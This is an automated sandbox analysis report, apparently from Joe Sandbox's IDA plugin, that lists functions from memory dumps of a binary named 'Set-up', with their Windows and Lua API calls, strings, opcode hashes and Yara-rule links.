Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Window$Long$Proc
String ID:
API String ID: 3468714886-0
Opcode ID: 8c88e709d36671888fa4d4d19abf75404b91ddcea4842a34e2f17b51ef1ca922
Instruction ID: 9f76c0405a61061ec672199a5f08085cb59e4d4a9e676f161841d4f7e929bd88
Opcode Fuzzy Hash: 8c88e709d36671888fa4d4d19abf75404b91ddcea4842a34e2f17b51ef1ca922
Instruction Fuzzy Hash: F4A15C71A00219DFDB20DF64CD88BAEBBB8FB48700F1185A9E54AEB251CB355950DF60

Function 00A68570 Relevance: 15.2, APIs: 10, Instructions: 207COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A685AA
GetDC.USER32(?), ref: 00A68632
SelectObject.GDI32(00000000,?), ref: 00A68642
GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00A686D6
GetTextExtentPoint32A.GDI32(?,?,?,00000000), ref: 00A68703
GetTextMetricsW.GDI32(?,?), ref: 00A68713
SelectObject.GDI32(?,?), ref: 00A6872B
ReleaseDC.USER32(?,?), ref: 00A6873A
GetSystemMetrics.USER32(00000002), ref: 00A687F8
MulDiv.KERNEL32(00000000,?,00000060), ref: 00A6880B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Text$ExtentMetricsObjectPoint32Select$RectReleaseSystemWindow
String ID:
API String ID: 3087991924-0
Opcode ID: 58b5a782068f586e08d61f9ed2f3e9fb18ed3d2c35e78ca0afee3232ac1a98d6
Instruction ID: aaeea1129b18d535ca94bfcc29e48f8372d1f82d73bf1dbfad55685822a5833a
Opcode Fuzzy Hash: 58b5a782068f586e08d61f9ed2f3e9fb18ed3d2c35e78ca0afee3232ac1a98d6
Instruction Fuzzy Hash: A191267190022ADFCB209F54DD84BADBBB5FF44300F0082D9E88AA7255DB349AA4CF90

Function 00A8A5D0 Relevance: 15.1, APIs: 10, Instructions: 132COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,70576E16,?,?), ref: 00A8A60C
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?), ref: 00A8A625
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?), ref: 00A8A64D
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?), ref: 00A8A763

Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A

Part of subcall function 00A7FC10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,70576E16), ref: 00A7FD12
Part of subcall function 00A7FC10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,70576E16), ref: 00A7FD4D

??0_Locinfo@std@@QAE@PBD@Z.MSVCP140(00000000,?), ref: 00A8A6A7
??0facet@locale@std@@IAE@I@Z.MSVCP140(00000000), ref: 00A8A6C1
?_Getcoll@_Locinfo@std@@QBE?AU_Collvec@@XZ.MSVCP140(?), ref: 00A8A6DA
??1_Locinfo@std@@QAE@XZ.MSVCP140 ref: 00A8A6EE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A8A721
std::_Facet_Register.LIBCPMT ref: 00A8A74B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Locinfo@std@@_invalid_parameter_noinfo_noreturn$??0_??1_Lockit@std@@$??0facet@locale@std@@Bid@locale@std@@Collvec@@Facet_Getcoll@_Getgloballocale@locale@std@@Locimp@12@Registermallocstd::_
String ID:
API String ID: 62940681-0
Opcode ID: 82817a166486a9353c1a6f3835ed9d1d075470d251a25ea0a40fea697924c754
Instruction ID: 9f52a3d7938ac117748ddb8af859d244dbabf8bfbd183be73e30a48915aa5a49
Opcode Fuzzy Hash: 82817a166486a9353c1a6f3835ed9d1d075470d251a25ea0a40fea697924c754
Instruction Fuzzy Hash: 6F51D271900248DFEB04EF94D988BAEFBB5FF94310F15816AE406A73A1DB74AE44CB51

Function 00A8A790 Relevance: 15.1, APIs: 10, Instructions: 132COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,70576E16,?,?,?), ref: 00A8A7CC
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?), ref: 00A8A7E5
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?), ref: 00A8A80D
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?), ref: 00A8A923

Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A

Part of subcall function 00A7FC10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,70576E16), ref: 00A7FD12
Part of subcall function 00A7FC10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,70576E16), ref: 00A7FD4D

??0_Locinfo@std@@QAE@PBD@Z.MSVCP140(00000000,?,?), ref: 00A8A867
??0facet@locale@std@@IAE@I@Z.MSVCP140(00000000), ref: 00A8A881
?_Getcoll@_Locinfo@std@@QBE?AU_Collvec@@XZ.MSVCP140(?), ref: 00A8A89A
??1_Locinfo@std@@QAE@XZ.MSVCP140 ref: 00A8A8AE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A8A8E1
std::_Facet_Register.LIBCPMT ref: 00A8A90B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Locinfo@std@@_invalid_parameter_noinfo_noreturn$??0_??1_Lockit@std@@$??0facet@locale@std@@Bid@locale@std@@Collvec@@Facet_Getcoll@_Getgloballocale@locale@std@@Locimp@12@Registermallocstd::_
String ID:
API String ID: 62940681-0
Opcode ID: 8a671779ea08df3e4959fe1805ed7028100a889aeaccefcf0fac30b90e1528a4
Instruction ID: ad4d07c99257c3ccf0284d0bfa0bc8f2d25fe55f9cd3d92a8e8580423a05148b
Opcode Fuzzy Hash: 8a671779ea08df3e4959fe1805ed7028100a889aeaccefcf0fac30b90e1528a4
Instruction Fuzzy Hash: 4E51D071900248DFEB04EF98D988BAEFBB5FF94310F158069E416A7391CB74AD41CB62

Function 00BED5A0 Relevance: 15.1, APIs: 7, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,00BE294D,?,00000000,?,?), ref: 00BED5C8
memcpy.VCRUNTIME140(?,?,0000003B,?,?,?,00BE294D,?,00000000,?,?), ref: 00BED5D8

Strings

..., xrefs: 00BED603
..., xrefs: 00BED687
[string ", xrefs: 00BED635

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: ...$...$[string "
API String ID: 3510742995-3302822706
Opcode ID: 47753fbb1368dc5b342626a8c036c210683d5b011022ddec6267a0c9cbb54e0d
Instruction ID: 7399d0055babd91f8e21a1b4441a1c264cb40a887720ecb8b6c89ba7d697928f
Opcode Fuzzy Hash: 47753fbb1368dc5b342626a8c036c210683d5b011022ddec6267a0c9cbb54e0d
Instruction Fuzzy Hash: FE316FAA9041922EC7311B29AC81BBFBBA8DF95354B2540B7FE58D3311EB514C29C3F5

Function 00A6F4E0 Relevance: 15.1, APIs: 10, Instructions: 102COMMON

Download Yara Rule

APIs

IsChild.USER32(?,?), ref: 00A6F51B
HideCaret.USER32(?), ref: 00A6F562
DestroyCaret.USER32 ref: 00A6F568
DeleteObject.GDI32(?), ref: 00A6F579
ImmGetContext.IMM32(?), ref: 00A6F58C
ImmNotifyIME.IMM32(00000000,00000015,00000001,00000000), ref: 00A6F59F
ImmReleaseContext.IMM32(?,00000000), ref: 00A6F5A7
HideCaret.USER32(?), ref: 00A6F5E6
DestroyCaret.USER32 ref: 00A6F5EC
DeleteObject.GDI32(?), ref: 00A6F5FD

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Caret$ContextDeleteDestroyHideObject$ChildNotifyRelease
String ID:
API String ID: 1512358881-0
Opcode ID: 9fe092676e4cc5f2275eb212354102465b2526466b1630efa6c32d1107afb5bf
Instruction ID: 17661d017b408dd21ec0125d89661ed7169440b834f5f6cf8ee483224382f911
Opcode Fuzzy Hash: 9fe092676e4cc5f2275eb212354102465b2526466b1630efa6c32d1107afb5bf
Instruction Fuzzy Hash: AA319C753006009FDB209F79EC48BAEBBE4AF48719F108529F99BC7291DB71AC01CB91

Function 00A72AF0 Relevance: 13.9, APIs: 9, Instructions: 436COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A72C92
memcpy.VCRUNTIME140(?,?), ref: 00A72CDD
ImmGetContext.IMM32(?,?,?,?,?), ref: 00A72DA2
ImmSetCompositionStringW.IMM32(00000000,00020000,?,?,00000000,00000000), ref: 00A72DC6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,00000000,?), ref: 00A72F9D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,00000000,?), ref: 00A72FEE
ImmReleaseContext.IMM32(?,?), ref: 00A7302E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A73065
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A730B8

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Context$CompositionReleaseStringmemcpy
String ID:
API String ID: 2573622734-0
Opcode ID: eada91b3e7500a3d61efd3f26f7ded293625d1749429f888856aa9d70ea334fc
Instruction ID: 53a2270906d7947d51322af454113e302539ea4500f9d73067320316e442b79d
Opcode Fuzzy Hash: eada91b3e7500a3d61efd3f26f7ded293625d1749429f888856aa9d70ea334fc
Instruction Fuzzy Hash: 45027D71900219DFDB24CF68CD84BAEBBB5EF49304F14C1A8E419AB255DB31AE85DF60

Function 00A63900 Relevance: 13.8, APIs: 9, Instructions: 272COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A63BC0
DeleteObject.GDI32(?), ref: 00A63BCB
DeleteDC.GDI32(?), ref: 00A63BD6
SelectObject.GDI32(?,?), ref: 00A63C09
DeleteObject.GDI32(00000000), ref: 00A63C0E
CreateSolidBrush.GDI32(?), ref: 00A63C23
SelectObject.GDI32(?,00000000), ref: 00A63C30
FrameRect.USER32(?,?,00000000), ref: 00A63C40

Part of subcall function 00A63670: CreateCompatibleDC.GDI32(?), ref: 00A636A6
Part of subcall function 00A63670: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00A63727
Part of subcall function 00A63670: SelectObject.GDI32(?,00000000), ref: 00A63741

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$Select$CreateDelete$BrushCompatibleFrameRectSectionSolid
String ID:
API String ID: 3456466422-0
Opcode ID: b70c7d81d4060ec37966a3aad0e65331a6997249eee0555afe500d1e1ae25afc
Instruction ID: ae70348ac4d1d671c37e41ffe37ff2d639a3b87ab0629f2d11682f48d8ceae25
Opcode Fuzzy Hash: b70c7d81d4060ec37966a3aad0e65331a6997249eee0555afe500d1e1ae25afc
Instruction Fuzzy Hash: 87B134726083028FCB14CF58C984A6ABBF5FF88744F05492DF99597311D731EA4ACB92

Function 00A6F620 Relevance: 13.7, APIs: 9, Instructions: 200COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00A6F687
ImmGetContext.IMM32(?), ref: 00A6F702
ImmSetCompositionWindow.IMM32(00000000,00000002,?,?,?,00000000), ref: 00A6F798
ImmReleaseContext.IMM32(?,00000000,?,?,00000000), ref: 00A6F7A0
DefWindowProcW.USER32(?,0000010F,?,?), ref: 00A6F7D5
DefWindowProcW.USER32(?,?,?,?,?), ref: 00A6F84F
DefWindowProcW.USER32(?,?,?,?), ref: 00A6F880
DefWindowProcW.USER32(?,?,?,?,70576E16), ref: 00A6F8B5
DefWindowProcW.USER32(?,?,?,?,70576E16), ref: 00A6F8CB

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Window$Proc$Context$CompositionRelease
String ID:
API String ID: 1324245488-0
Opcode ID: 42a1129d33ffb3068562e7b848e2ed3b18d3f9a71dcf5879538b6ade115bbef6
Instruction ID: c01faceafdf70cf84856a50930c2f053b72e27f8c71eb334dc6274664e465c7f
Opcode Fuzzy Hash: 42a1129d33ffb3068562e7b848e2ed3b18d3f9a71dcf5879538b6ade115bbef6
Instruction Fuzzy Hash: 3A71CE31604244EFCB24EFA4DD48BAEBBB9FF85314F114469F85697261CB31AD01CB21

Function 00BDC6A0 Relevance: 13.6, APIs: 9, Instructions: 143stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140 ref: 00BDC707
luaL_prepbuffsize.SET-UP(?,00000000), ref: 00BDC724
memcpy.VCRUNTIME140(00000000,?,00000000,?,00000000), ref: 00BDC72C
luaL_prepbuffsize.SET-UP(?,?), ref: 00BDC752
memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 00BDC75A
strstr.VCRUNTIME140 ref: 00BDC771
luaL_prepbuffsize.SET-UP(?,?), ref: 00BDC798
memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 00BDC7A0
luaL_pushresult.SET-UP(?), ref: 00BDC7B1

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_prepbuffsizememcpy$strstr$L_pushresult
String ID:
API String ID: 627481426-0
Opcode ID: f93702303921785c0ad47b92b0ec09c3795fa203752234871dd456604f19b5e1
Instruction ID: f976e26ef0bec98bc00c946c01b0133c4fd5bbca41a019fd10b761dbcbfe6fc0
Opcode Fuzzy Hash: f93702303921785c0ad47b92b0ec09c3795fa203752234871dd456604f19b5e1
Instruction Fuzzy Hash: F141C8759043459BC720DF28C88596FBBE8EF85364F040AAEF99997341EB31D904CBA2

Function 00A6D050 Relevance: 13.6, APIs: 9, Instructions: 130COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00A6D089
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00A6D099
GetUpdateRgn.USER32(?,00000000,00000000), ref: 00A6D0AE
BeginPaint.USER32(?,?), ref: 00A6D0BF

Part of subcall function 00A6CA40: CreateRectRgnIndirect.GDI32(?), ref: 00A6CB18
Part of subcall function 00A6CA40: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00A6CB2F
Part of subcall function 00A6CA40: CombineRgn.GDI32(00000000,00000000,?,00000004), ref: 00A6CB48

DeleteObject.GDI32(?), ref: 00A6D199
EndPaint.USER32(?,?), ref: 00A6D1B4
GetDC.USER32(?), ref: 00A6D1E3
ReleaseDC.USER32(?,00000000), ref: 00A6D1FA
ValidateRect.USER32(?,00000000), ref: 00A6D208

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Rect$Create$Paint$BeginCombineDeleteIndirectObjectReleaseUpdateValidatememset
String ID:
API String ID: 4135010277-0
Opcode ID: cb26efcee7b15245e2fd90ffe1aedaccacd3b704d979ca0e9c6846884b5e016a
Instruction ID: 78a46c2e22c0c0410dcc9d84388cb8f8ffcc4ad56e67e8186f9eaf4e2f6b42a4
Opcode Fuzzy Hash: cb26efcee7b15245e2fd90ffe1aedaccacd3b704d979ca0e9c6846884b5e016a
Instruction Fuzzy Hash: 5A513470704742AFD358DF28C949B6AFBE4FF89305F04421AF99997290DB71A861CF92

Function 00A6B710 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 178COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75296BA0), ref: 00A6B83A
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,75296BA0,00A632E3), ref: 00A6B85D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75296BA0), ref: 00A6B8D2

Strings

gfff, xrefs: 00A6B73B
gfff, xrefs: 00A6B762
gfff, xrefs: 00A6B86E
gfff, xrefs: 00A6B719

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID: gfff$gfff$gfff$gfff
API String ID: 2665656946-2178600047
Opcode ID: 9b53dbbf04ce1923fe026bd4dac8c946636688723daa651aeea12d4528f4c874
Instruction ID: 9170a017c78fcab7988272195c8c08f2752f1b85505c6ef72346a79bb52e27fa
Opcode Fuzzy Hash: 9b53dbbf04ce1923fe026bd4dac8c946636688723daa651aeea12d4528f4c874
Instruction Fuzzy Hash: E251A5B2A101099FCB18DF2DD995A6DB7B5EFC43407188269E80ACF345EB31EA45CB91

Function 00BDA3D0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00BDA2A0: lua_getinfo.SET-UP(?,00C5F5BC,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA2BE
Part of subcall function 00BDA2A0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,_G.,00000003,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA34D
Part of subcall function 00BDA2A0: lua_pushstring.SET-UP(?,?,?,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA35F
